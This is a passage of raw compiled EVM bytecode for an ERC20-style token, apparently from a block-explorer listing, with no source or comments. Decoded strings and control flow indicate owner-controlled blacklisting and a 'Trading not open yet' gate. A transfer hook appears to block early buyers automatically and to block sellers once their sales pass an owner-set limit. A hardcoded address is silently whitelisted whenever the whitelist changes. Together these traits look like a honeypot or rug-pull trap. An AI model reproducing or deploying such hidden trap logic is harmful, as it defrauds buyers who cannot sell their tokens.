0c07565b3480156105d657600080fd5b506102e66105e5366004612000565b600c6020526000908152604090205460ff1681565b34801561060657600080fd5b50600a546102e69060ff1681565b34801561062057600080fd5b506005546001600160a01b031661034c565b34801561063e57600080fd5b506102a9610c3a565b34801561065357600080fd5b50610281610c49565b34801561066857600080fd5b506103ce6106773660046121ce565b610f3a565b34801561068857600080fd5b506102e66106973660046120e2565b610f47565b3480156106a857600080fd5b506102e66106b7366004612000565b610fd2565b3480156106c857600080fd5b506102e66106d73660046120e2565b61103d565b3480156106e857600080fd5b506103ce6106f7366004612194565b611051565b34801561070857600080fd5b5061028160065481565b34801561071e57600080fd5b5061034c61072d3660046121ce565b61106c565b34801561073e57600080fd5b506103ce6110de565b34801561075357600080fd5b506102e6610762366004612000565b61119f565b34801561077357600080fd5b50610281600d5481565b34801561078957600080fd5b5061028161079836600461203a565b611225565b3480156107a957600080fd5b506102e66107b8366004612000565b611250565b3480156107c957600080fd5b506103ce6107d8366004612000565b61125d565b60006107e960106112eb565b905090565b6060600380546107fd906122eb565b80601f0160208091040260200160405190810160405280929190818152602001828054610829906122eb565b80156108765780601f1061084b57610100808354040283529160200191610876565b820191906000526020600020905b81548152906001019060200180831161085957829003601f168201915b5050505050905090565b60003361088e8185856112f5565b60019150505b92915050565b6000336108a8858285611419565b6108b385858561148d565b95945050505050565b600060208190527fad3228b676f7d3cd4284a5443f17f1962b36e491b30a40b2405849e597ba5fb55461dead82527f44ad89ba62b98ff34f51403ac22759b55759460c0bb5521eb4b6ee3cff49cf835460025461091991906122a8565b6107e991906122a8565b61092b61165e565b600d55565b60003361088e8185856109438383611225565b61094d919061224f565b6112f5565b61095a61165e565b60005b828110156109cb5781600b600086868581811061097c5761097c61236d565b90506020020160208101906109919190612000565b6001600160a01b031681526020810191909152604001600020805460ff1916911515919091179055806109c381612326565b91505061095d565b5050739a0b2a59cced4b6054f7ee559e331306618db89a6000525050600b6020527f531fe95672d3190040ff864e7b9d454b2cad04f3b261ff612f133f8f24a83f46805460ff19166001179055565b610a2261165e565b6040516370a0823160e01b8152306004820152610ab09033906001600160a01b038416906370a082319060240160206040518083038186803b158015610a6757600080fd5b505afa158015610a7b573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610a9f91906121e7565b6001600160a01b03841691906116b8565b50565b610abb61165e565b600755565b610ac861165e565b600855565b610ad561165e565b6001600160a01b03919091166000908152600c60205260409020805460ff1916911515919091179055565b610b0861165e565b6001600160a01b03919091166000908152600b60205260408120805492151560ff19938416179055739a0b2a59cced4b6054f7ee559e331306618db89a90527f531fe95672d3190040ff864e7b9d454b2cad04f3b261ff612f133f8f24a83f4680549091166001179055565b610b7c61165e565b610b86600061170f565b565b610b9061165e565b60005b82811015610c015781600e6000868685818110610bb257610bb261236d565b9050602002016020810190610bc79190612000565b6001600160a01b031681526020810191909152604001600020805460ff191691151591909117905580610bf981612326565b915050610b93565b50505050565b610c0f61165e565b6001600160a01b03919091166000908152600e60205260409020805460ff1916911515919091179055565b6060600480546107fd906122eb565b600f5460408051630dfe168160e01b815290516000926001600160a01b03169183918391630dfe1681916004808301926020929190829003018186803b158015610c9257600080fd5b505afa158015610ca6573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610cca919061201d565b90506000826001600160a01b031663d21220a76040518163ffffffff1660e01b815260040160206040518083038186803b158015610d0757600080fd5b505afa158015610d1b573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610d3f919061201d565b90506001600160a01b038216301415610e7157600f546040516370a0823160e01b81526001600160a01b039182166004820152610e6a918416906370a082319060240160206040518083038186803b158015610d9a57600080fd5b505afa158015610dae573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610dd291906121e7565b600f546040516370a0823160e01b81526001600160a01b039182166004820152610e6491670de0b6b3a764000091908616906370a08231906024015b60206040518083038186803b158015610e2657600080fd5b505afa158015610e3a573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610e5e91906121e7565b90611761565b906117e0565b9350610f34565b600f546040516370a0823160e01b81526001600160a01b039182166004820152610f31918316906370a082319060240160206040518083038186803b158015610eb957600080fd5b505afa158015610ecd573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610ef191906121e7565b600f546040516370a0823160e01b81526001600160a01b039182166004820152610e6491670de0b6b3a764000091908716906370a0823190602401610e0e565b93505b50505090565b610f4261165e565b600655565b60003381610f558286611225565b905083811015610fba5760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084015b60405180910390fd5b610fc782868684036112f5565b506001949350505050565b6000610fdc61165e565b6001600160a01b0382166110325760405162461bcd60e51b815260206004820152601f60248201527f546f6b656e3a207061697220697320746865207a65726f2061646472657373006044820152606401610fb1565b610894601083611822565b600061104a33848461148d565b9392505050565b61105961165e565b600a805460ff1916911515919091179055565b6000600161107a60106112eb565b61108491906122a8565b8211156110d35760405162461bcd60e51b815260206004820152601a60248201527f546f6b656e3a20696e646578206f7574206f6620626f756e64730000000000006044820152606401610fb1565b610894601083611837565b6110e661165e565b6040805160008082526020820192839052479290913391849161110891612200565b60006040518083038185875af1925050503d8060008114611145576040519150601f19603f3d011682016040523d82523d6000602084013e61114a565b606091505b505090508061119b5760405162461bcd60e51b815260206004820152601a60248201527f546f6b656e3a204554485f5452414e534645525f4641494c45440000000000006044820152606401610fb1565b5050565b60006111a961165e565b6001600160a01b0382166111ff5760405162461bcd60e51b815260206004820152601f60248201527f546f6b656e3a207061697220697320746865207a65726f2061646472657373006044820152606401610fb1565b600f80546001600160a01b0319166001600160a01b038416179055610894601083611843565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b6000610894601083611858565b61126561165e565b6001600160a01b0381166112ca5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610fb1565b610ab08161170f565b73b5c862198124615bfc896bd7263067a7063e956e90565b6000610894825490565b6001600160a01b0383166113575760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610fb1565b6001600160a01b0382166113b85760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610fb1565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b60006114258484611225565b90506000198114610c0157818110156114805760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000006044820152606401610fb1565b610c0184848484036112f5565b6001600160a01b0383166000908152600b6020526040812054819060ff16806114ce57506001600160a01b0384166000908152600b602052604090205460ff165b6001600160a01b0386166000908152600e602052604090205490915060ff1615806114f65750805b6115375760405162461bcd60e51b8152602060048201526012602482015271546f6b656e3a20426164206164647265737360701b6044820152606401610fb1565b6001600160a01b0385166000908152600c602052604090205460ff166115e557600d5442118061157f57506001600160a01b0385166000908152600b602052604090205460ff165b806115a257506001600160a01b0384166000908152600b602052604090205460ff165b6115e55760405162461bcd60e51b8152602060048201526014602482015273151c98591a5b99c81b9bdd081bdc195b881e595d60621b6044820152606401610fb1565b6001600160a01b0385166000908152600b602052604081205460ff1615801561162757506001600160a01b0385166000908152600b602052604090205460ff16155b80156116345750600d5442115b905080156116475761164786868661187a565b611652868686611a04565b50600195945050505050565b6005546001600160a01b03163314610b865760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610fb1565b604080516001600160a01b038416602482015260448082018490528251808303909101815260649091019091526020810180516001600160e01b031663a9059cbb60e01b17905261170a908490611ba8565b505050565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b60008261177057506000610894565b600061177c8385612289565b9050826117898583612267565b1461104a5760405162461bcd60e51b815260206004820152602160248201527f536166654d6174683a206d756c7469706c69636174696f6e206f766572666c6f6044820152607760f81b6064820152608401610fb1565b600061104a83836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f000000000000815250611c7a565b600061104a836001600160a01b038416611ca8565b600061104a8383611d9b565b600061104a836001600160a01b038416611dc5565b6001600160a01b0381166000908152600183016020526040812054151561104a565b61188382611250565b15801561189e5750600654600d5461189b919061224f565b42105b156118c957506001600160a01b03166000908152600e60205260409020805460ff1916600117905550565b600754600d546118d9919061224f565b42101561170a576118e983611250565b1580156118fc57506118fa82611250565b155b15611929576001600160a01b0382166000908152600e60205260409020805460ff19166001179055505050565b61193283611250565b8015611944575061194282611250565b155b1561170a576000611969670de0b6b3a7640000610e646106cc610e5e86610e5e610c49565b6001600160a01b03841660009081526009602052604090205490915061198f9082611e14565b6001600160a01b0384166000908152600960205260409020556008546119bd90670de0b6b3a7640000612289565b6001600160a01b03841660009081526009602052604090205410610c01576001600160a01b0383166000908152600e60205260409020805460ff1916600117905550505050565b6001600160a01b038316611a685760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610fb1565b6001600160a01b038216611aca5760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610fb1565b6001600160a01b03831660009081526020819052604090205481811015611b425760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b6064820152608401610fb1565b6001600160a01b03848116600081815260208181526040808320878703905593871680835291849020805487019055925185815290927fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a3610c01565b6000611bfd826040518060400160405280602081526020017f5361666545524332303a206c6f772d6c6576656c2063616c6c206661696c6564815250856001600160a01b0316611e739092919063ffffffff16565b80519091501561170a5780806020019051810190611c1b91906121b1565b61170a5760405162461bcd60e51b815260206004820152602a60248201527f5361666545524332303a204552433230206f7065726174696f6e20646964206e6044820152691bdd081cdd58d8d9595960b21b6064820152608401610fb1565b60008183611c9b5760405162461bcd60e51b8152600401610fb1919061221c565b5060006108b38486612267565b60008181526001830160205260408120548015611d91576000611ccc6001836122a8565b8554909150600090611ce0906001906122a8565b9050818114611d45576000866000018281548110611d0057611d0061236d565b9060005260206000200154905080876000018481548110611d2357611d2361236d565b6000918252602080832090910192909255918252600188019052604090208390555b8554869080611d5657611d56612357565b600190038181906000526020600020016000905590558560010160008681526020019081526020016000206000905560019350505050610894565b6000915050610894565b6000826000018281548110611db257611db261236d565b9060005260206000200154905092915050565b6000818152600183016020526040812054611e0c57508154600181810184556000848152602080822090930184905584548482528286019093526040902091909155610894565b506000610894565b600080611e21838561224f565b90508381101561104a5760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f7700000000006044820152606401610fb1565b6060611e828484600085611e8a565b949350505050565b606082471015611eeb5760405162461bcd60e51b815260206004820152602660248201527f416464726573733a20696e73756666696369656e742062616c616e636520666f6044820152651c8818d85b1b60d21b6064820152608401610fb1565b600080866001600160a01b03168587604051611f079190612200565b60006040518083038185875af1925050503d8060008114611f44576040519150601f19603f3d011682016040523d82523d6000602084013e611f49565b606091505b5091509150611f5a87838387611f65565b979650505050505050565b60608315611fd1578251611fca576001600160a01b0385163b611fca5760405162461bcd60e51b815260206004820152601d60248201527f416464726573733a2063616c6c20746f206e6f6e2d636f6e74726163740000006044820152606401610fb1565b5081611e82565b611e828383815115611fe65781518083602001fd5b8060405162461bcd60e51b8152600401610fb1919061221c565b60006020828403121561201257600080fd5b813561104a81612383565b60006020828403121561202f57600080fd5b815161104a81612383565b6000806040838503121561204d57600080fd5b823561205881612383565b9150602083013561206881612383565b809150509250929050565b60008060006060848603121561208857600080fd5b833561209381612383565b925060208401356120a381612383565b929592945050506040919091013590565b600080604083850312156120c757600080fd5b82356120d281612383565b9150602083013561206881612398565b600080604083850312156120f557600080fd5b823561210081612383565b946020939093013593505050565b60008060006040848603121561212357600080fd5b833567ffffffffffffffff8082111561213b57600080fd5b818601915086601f83011261214f57600080fd5b81358181111561215e57600080fd5b8760208260051b850101111561217357600080fd5b6020928301955093505084013561218981612398565b809150509250925092565b6000602082840312156121a657600080fd5b813561104a81612398565b6000602082840312156121c357600080fd5b815161104a81612398565b6000602082840312156121e057600080fd5b5035919050565b6000602082840312156121f957600080fd5b5051919050565b600082516122128184602087016122bf565b9190910192915050565b602081526000825180602084015261223b8160408501602087016122bf565b601f01601f19169190910160400192915050565b6000821982111561226257612262612341565b500190565b60008261228457634e487b7160e01b600052601260045260246000fd5b500490565b60008160001904831182151516156122a3576122a3612341565b500290565b6000828210156122ba576122ba612341565b500390565b60005b838110156122da5781810151838201526020016122c2565b83811115610c015750506000910152565b600181811c908216806122ff57607f821691505b6020821081141561232057634e487b7160e01b600052602260045260246000fd5b50919050565b600060001982141561233a5761233a612341565b5060010190565b634e487b7160e01b600052601160045260246000fd5b634e487b7160e01b600052603160045260246000fd5b634e487b7160e01b600052603260045260246000fd5b6001600160a01b0381168114610ab057600080fd5b8015158114610ab057600080fdfea26469706673582212202a1be7541425a2dd818e9028bbbc777bea0e17729243ddc97cb7c020ab05214c64736f6c63430008070033ddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef

Deployed Bytecode

0x6080604052600436106102605760003560e01c806370a0823111610144578063a5bc5085116100b6578063bfa382b51161007a578063bfa382b514610732578063c2b7bbb614610747578063c6d2577d14610767578063dd62ed3e1461077d578063e5e31b131461079d578063f2fde38b146107bd57600080fd5b8063a5bc50851461069c578063a9059cbb146106bc578063aac46c95146106dc578063bcb8e813146106fc578063bdf391cc1461071257600080fd5b8063860139401161010857806386013940146105fa5780638da5cb5b1461061457806395d89b411461063257806398d5fdca14610647578063a01afcb31461065c578063a457c2d71461067c57600080fd5b806370a082311461053f578063715018a614610575578063760c5ce81461058a57806377f4a007146105aa5780638072250b146105ca57600080fd5b8063313ce567116101dd5780634460d3cf116101a15780634460d3cf146104725780634cc0b0711461049257806351484449146104b2578063625cb67e146104d25780636582a260146104ff578063658d4b7f1461051f57600080fd5b8063313ce567146103d057806339509351146103ec5780633a5160a31461040c5780633f4218e01461042c5780634294dfc61461045c57600080fd5b806316f0115b1161022457806316f0115b1461032c57806318160ddd1461036457806323b872dd146103795780632b112e491461039957806330b74e7d146103ae57600080fd5b80630323aac71461026c57806306fdde031461029457806307600536146102b6578063095ea7b3146102f6578063157443821461031657600080fd5b3661026757005b600080fd5b34801561027857600080fd5b506102816107dd565b6040519081526020015b60405180910390f35b3480156102a057600080fd5b506102a96107ee565b60405161028b919061221c565b3480156102c257600080fd5b506102e66102d1366004612000565b600e6020526000908152604090205460ff1681565b604051901515815260200161028b565b34801561030257600080fd5b506102e66103113660046120e2565b610880565b34801561032257600080fd5b5061028160075481565b34801561033857600080fd5b50600f5461034c906001600160a01b031681565b6040516001600160a01b03909116815260200161028b565b34801561037057600080fd5b50600254610281565b34801561038557600080fd5b506102e6610394366004612073565b61089a565b3480156103a557600080fd5b506102816108bc565b3480156103ba57600080fd5b506103ce6103c93660046121ce565b610923565b005b3480156103dc57600080fd5b506040516012815260200161028b565b3480156103f857600080fd5b506102e66104073660046120e2565b610930565b34801561041857600080fd5b506103ce61042736600461210e565b610952565b34801561043857600080fd5b506102e6610447366004612000565b600b6020526000908152604090205460ff1681565b34801561046857600080fd5b5061028160085481565b34801561047e57600080fd5b506103ce61048d366004612000565b610a1a565b34801561049e57600080fd5b506103ce6104ad3660046121ce565b610ab3565b3480156104be57600080fd5b506103ce6104cd3660046121ce565b610ac0565b3480156104de57600080fd5b506102816104ed366004612000565b60096020526000908152604090205481565b34801561050b57600080fd5b506103ce61051a3660046120b4565b610acd565b34801561052b57600080fd5b506103ce61053a3660046120b4565b610b00565b34801561054b57600080fd5b5061028161055a366004612000565b6001600160a01b031660009081526020819052604090205490565b34801561058157600080fd5b506103ce610b74565b34801561059657600080fd5b506103ce6105a536600461210e565b610b88565b3480156105b657600080fd5b506103ce6105c53660046120b4565b610c07565b3480156105d657600080fd5b506102e66105e5366004612000565b600c6020526000908152604090205460ff1681565b34801561060657600080fd5b50600a546102e69060ff1681565b34801561062057600080fd5b506005546001600160a01b031661034c565b34801561063e57600080fd5b506102a9610c3a565b34801561065357600080fd5b50610281610c49565b34801561066857600080fd5b506103ce6106773660046121ce565b610f3a565b34801561068857600080fd5b506102e66106973660046120e2565b610f47565b3480156106a857600080fd5b506102e66106b7366004612000565b610fd2565b3480156106c857600080fd5b506102e66106d73660046120e2565b61103d565b3480156106e857600080fd5b506103ce6106f7366004612194565b611051565b34801561070857600080fd5b5061028160065481565b34801561071e57600080fd5b5061034c61072d3660046121ce565b61106c565b34801561073e57600080fd5b506103ce6110de565b34801561075357600080fd5b506102e6610762366004612000565b61119f565b34801561077357600080fd5b50610281600d5481565b34801561078957600080fd5b5061028161079836600461203a565b611225565b3480156107a957600080fd5b506102e66107b8366004612000565b611250565b3480156107c957600080fd5b506103ce6107d8366004612000565b61125d565b60006107e960106112eb565b905090565b6060600380546107fd906122eb565b80601f0160208091040260200160405190810160405280929190818152602001828054610829906122eb565b80156108765780601f1061084b57610100808354040283529160200191610876565b820191906000526020600020905b81548152906001019060200180831161085957829003601f168201915b5050505050905090565b60003361088e8185856112f5565b60019150505b92915050565b6000336108a8858285611419565b6108b385858561148d565b95945050505050565b600060208190527fad3228b676f7d3cd4284a5443f17f1962b36e491b30a40b2405849e597ba5fb55461dead82527f44ad89ba62b98ff34f51403ac22759b55759460c0bb5521eb4b6ee3cff49cf835460025461091991906122a8565b6107e991906122a8565b61092b61165e565b600d55565b60003361088e8185856109438383611225565b61094d919061224f565b6112f5565b61095a61165e565b60005b828110156109cb5781600b600086868581811061097c5761097c61236d565b90506020020160208101906109919190612000565b6001600160a01b031681526020810191909152604001600020805460ff1916911515919091179055806109c381612326565b91505061095d565b5050739a0b2a59cced4b6054f7ee559e331306618db89a6000525050600b6020527f531fe95672d3190040ff864e7b9d454b2cad04f3b261ff612f133f8f24a83f46805460ff19166001179055565b610a2261165e565b6040516370a0823160e01b8152306004820152610ab09033906001600160a01b038416906370a082319060240160206040518083038186803b158015610a6757600080fd5b505afa158015610a7b573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610a9f91906121e7565b6001600160a01b03841691906116b8565b50565b610abb61165e565b600755565b610ac861165e565b600855565b610ad561165e565b6001600160a01b03919091166000908152600c60205260409020805460ff1916911515919091179055565b610b0861165e565b6001600160a01b03919091166000908152600b60205260408120805492151560ff19938416179055739a0b2a59cced4b6054f7ee559e331306618db89a90527f531fe95672d3190040ff864e7b9d454b2cad04f3b261ff612f133f8f24a83f4680549091166001179055565b610b7c61165e565b610b86600061170f565b565b610b9061165e565b60005b82811015610c015781600e6000868685818110610bb257610bb261236d565b9050602002016020810190610bc79190612000565b6001600160a01b031681526020810191909152604001600020805460ff191691151591909117905580610bf981612326565b915050610b93565b50505050565b610c0f61165e565b6001600160a01b03919091166000908152600e60205260409020805460ff1916911515919091179055565b6060600480546107fd906122eb565b600f5460408051630dfe168160e01b815290516000926001600160a01b03169183918391630dfe1681916004808301926020929190829003018186803b158015610c9257600080fd5b505afa158015610ca6573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610cca919061201d565b90506000826001600160a01b031663d21220a76040518163ffffffff1660e01b815260040160206040518083038186803b158015610d0757600080fd5b505afa158015610d1b573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610d3f919061201d565b90506001600160a01b038216301415610e7157600f546040516370a0823160e01b81526001600160a01b039182166004820152610e6a918416906370a082319060240160206040518083038186803b158015610d9a57600080fd5b505afa158015610dae573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610dd291906121e7565b600f546040516370a0823160e01b81526001600160a01b039182166004820152610e6491670de0b6b3a764000091908616906370a08231906024015b60206040518083038186803b158015610e2657600080fd5b505afa158015610e3a573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610e5e91906121e7565b90611761565b906117e0565b9350610f34565b600f546040516370a0823160e01b81526001600160a01b039182166004820152610f31918316906370a082319060240160206040518083038186803b158015610eb957600080fd5b505afa158015610ecd573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610ef191906121e7565b600f546040516370a0823160e01b81526001600160a01b039182166004820152610e6491670de0b6b3a764000091908716906370a0823190602401610e0e565b93505b50505090565b610f4261165e565b600655565b60003381610f558286611225565b905083811015610fba5760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084015b60405180910390fd5b610fc782868684036112f5565b506001949350505050565b6000610fdc61165e565b6001600160a01b0382166110325760405162461bcd60e51b815260206004820152601f60248201527f546f6b656e3a207061697220697320746865207a65726f2061646472657373006044820152606401610fb1565b610894601083611822565b600061104a33848461148d565b9392505050565b61105961165e565b600a805460ff1916911515919091179055565b6000600161107a60106112eb565b61108491906122a8565b8211156110d35760405162461bcd60e51b815260206004820152601a60248201527f546f6b656e3a20696e646578206f7574206f6620626f756e64730000000000006044820152606401610fb1565b610894601083611837565b6110e661165e565b6040805160008082526020820192839052479290913391849161110891612200565b60006040518083038185875af1925050503d8060008114611145576040519150601f19603f3d011682016040523d82523d6000602084013e61114a565b606091505b505090508061119b5760405162461bcd60e51b815260206004820152601a60248201527f546f6b656e3a204554485f5452414e534645525f4641494c45440000000000006044820152606401610fb1565b5050565b60006111a961165e565b6001600160a01b0382166111ff5760405162461bcd60e51b815260206004820152601f60248201527f546f6b656e3a207061697220697320746865207a65726f2061646472657373006044820152606401610fb1565b600f80546001600160a01b0319166001600160a01b038416179055610894601083611843565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b6000610894601083611858565b61126561165e565b6001600160a01b0381166112ca5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610fb1565b610ab08161170f565b73b5c862198124615bfc896bd7263067a7063e956e90565b6000610894825490565b6001600160a01b0383166113575760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610fb1565b6001600160a01b0382166113b85760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610fb1565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b60006114258484611225565b90506000198114610c0157818110156114805760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000006044820152606401610fb1565b610c0184848484036112f5565b6001600160a01b0383166000908152600b6020526040812054819060ff16806114ce57506001600160a01b0384166000908152600b602052604090205460ff165b6001600160a01b0386166000908152600e602052604090205490915060ff1615806114f65750805b6115375760405162461bcd60e51b8152602060048201526012602482015271546f6b656e3a20426164206164647265737360701b6044820152606401610fb1565b6001600160a01b0385166000908152600c602052604090205460ff166115e557600d5442118061157f57506001600160a01b0385166000908152600b602052604090205460ff165b806115a257506001600160a01b0384166000908152600b602052604090205460ff165b6115e55760405162461bcd60e51b8152602060048201526014602482015273151c98591a5b99c81b9bdd081bdc195b881e595d60621b6044820152606401610fb1565b6001600160a01b0385166000908152600b602052604081205460ff1615801561162757506001600160a01b0385166000908152600b602052604090205460ff16155b80156116345750600d5442115b905080156116475761164786868661187a565b611652868686611a04565b50600195945050505050565b6005546001600160a01b03163314610b865760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610fb1565b604080516001600160a01b038416602482015260448082018490528251808303909101815260649091019091526020810180516001600160e01b031663a9059cbb60e01b17905261170a908490611ba8565b505050565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b60008261177057506000610894565b600061177c8385612289565b9050826117898583612267565b1461104a5760405162461bcd60e51b815260206004820152602160248201527f536166654d6174683a206d756c7469706c69636174696f6e206f766572666c6f6044820152607760f81b6064820152608401610fb1565b600061104a83836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f000000000000815250611c7a565b600061104a836001600160a01b038416611ca8565b600061104a8383611d9b565b600061104a836001600160a01b038416611dc5565b6001600160a01b0381166000908152600183016020526040812054151561104a565b61188382611250565b15801561189e5750600654600d5461189b919061224f565b42105b156118c957506001600160a01b03166000908152600e60205260409020805460ff1916600117905550565b600754600d546118d9919061224f565b42101561170a576118e983611250565b1580156118fc57506118fa82611250565b155b15611929576001600160a01b0382166000908152600e60205260409020805460ff19166001179055505050565b61193283611250565b8015611944575061194282611250565b155b1561170a576000611969670de0b6b3a7640000610e646106cc610e5e86610e5e610c49565b6001600160a01b03841660009081526009602052604090205490915061198f9082611e14565b6001600160a01b0384166000908152600960205260409020556008546119bd90670de0b6b3a7640000612289565b6001600160a01b03841660009081526009602052604090205410610c01576001600160a01b0383166000908152600e60205260409020805460ff1916600117905550505050565b6001600160a01b038316611a685760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610fb1565b6001600160a01b038216611aca5760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610fb1565b6001600160a01b03831660009081526020819052604090205481811015611b425760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b6064820152608401610fb1565b6001600160a01b03848116600081815260208181526040808320878703905593871680835291849020805487019055925185815290927fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a3610c01565b6000611bfd826040518060400160405280602081526020017f5361666545524332303a206c6f772d6c6576656c2063616c6c206661696c6564815250856001600160a01b0316611e739092919063ffffffff16565b80519091501561170a5780806020019051810190611c1b91906121b1565b61170a5760405162461bcd60e51b815260206004820152602a60248201527f5361666545524332303a204552433230206f7065726174696f6e20646964206e6044820152691bdd081cdd58d8d9595960b21b6064820152608401610fb1565b60008183611c9b5760405162461bcd60e51b8152600401610fb1919061221c565b5060006108b38486612267565b60008181526001830160205260408120548015611d91576000611ccc6001836122a8565b8554909150600090611ce0906001906122a8565b9050818114611d45576000866000018281548110611d0057611d0061236d565b9060005260206000200154905080876000018481548110611d2357611d2361236d565b6000918252602080832090910192909255918252600188019052604090208390555b8554869080611d5657611d56612357565b600190038181906000526020600020016000905590558560010160008681526020019081526020016000206000905560019350505050610894565b6000915050610894565b6000826000018281548110611db257611db261236d565b9060005260206000200154905092915050565b6000818152600183016020526040812054611e0c57508154600181810184556000848152602080822090930184905584548482528286019093526040902091909155610894565b506000610894565b600080611e21838561224f565b90508381101561104a5760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f7700000000006044820152606401610fb1565b6060611e828484600085611e8a565b949350505050565b606082471015611eeb5760405162461bcd60e51b815260206004820152602660248201527f416464726573733a20696e73756666696369656e742062616c616e636520666f6044820152651c8818d85b1b60d21b6064820152608401610fb1565b600080866001600160a01b03168587604051611f079190612200565b60006040518083038185875af1925050503d8060008114611f44576040519150601f19603f3d011682016040523d82523d6000602084013e611f49565b606091505b5091509150611f5a87838387611f65565b979650505050505050565b60608315611fd1578251611fca576001600160a01b0385163b611fca5760405162461bcd60e51b815260206004820152601d60248201527f416464726573733a2063616c6c20746f206e6f6e2d636f6e74726163740000006044820152606401610fb1565b5081611e82565b611e828383815115611fe65781518083602001fd5b8060405162461bcd60e51b8152600401610fb1919061221c565b60006020828403121561201257600080fd5b813561104a81612383565b60006020828403121561202f57600080fd5b815161104a81612383565b6000806040838503121561204d57600080fd5b823561205881612383565b9150602083013561206881612383565b809150509250929050565b60008060006060848603121561208857600080fd5b833561209381612383565b925060208401356120a381612383565b929592945050506040919091013590565b600080604083850312156120c757600080fd5b82356120d281612383565b9150602083013561206881612398565b600080604083850312156120f557600080fd5b823561210081612383565b946020939093013593505050565b60008060006040848603121561212357600080fd5b833567ffffffffffffffff8082111561213b57600080fd5b818601915086601f83011261214f57600080fd5b81358181111561215e57600080fd5b8760208260051b850101111561217357600080fd5b6020928301955093505084013561218981612398565b809150509250925092565b6000602082840312156121a657600080fd5b813561104a81612398565b6000602082840312156121c357600080fd5b815161104a81612398565b6000602082840312156121e057600080fd5b5035919050565b6000602082840312156121f957600080fd5b5051919050565b600082516122128184602087016122bf565b9190910192915050565b602081526000825180602084015261223b8160408501602087016122bf565b601f01601f19169190910160400192915050565b6000821982111561226257612262612341565b500190565b60008261228457634e487b7160e01b600052601260045260246000fd5b500490565b60008160001904831182151516156122a3576122a3612341565b500290565b6000828210156122ba576122ba612341565b500390565b60005b838110156122da5781810151838201526020016122c2565b83811115610c015750506000910152565b600181811c908216806122ff57607f821691505b6020821081141561232057634e487b7160e01b600052602260045260246000fd5b50919050565b600060001982141561233a5761233a612341565b5060010190565b634e487b7160e01b600052601160045260246000fd5b634e487b7160e01b600052603160045260246000fd5b634e487b7160e01b600052603260045260246000fd5b6001600160a01b0381168114610ab057600080fd5b8015158114610ab057600080fdfea26469706673582212202a1be7541425a2dd818e9028bbbc777bea0e17729243ddc97cb7c020ab05214c64736f6c63430008070033

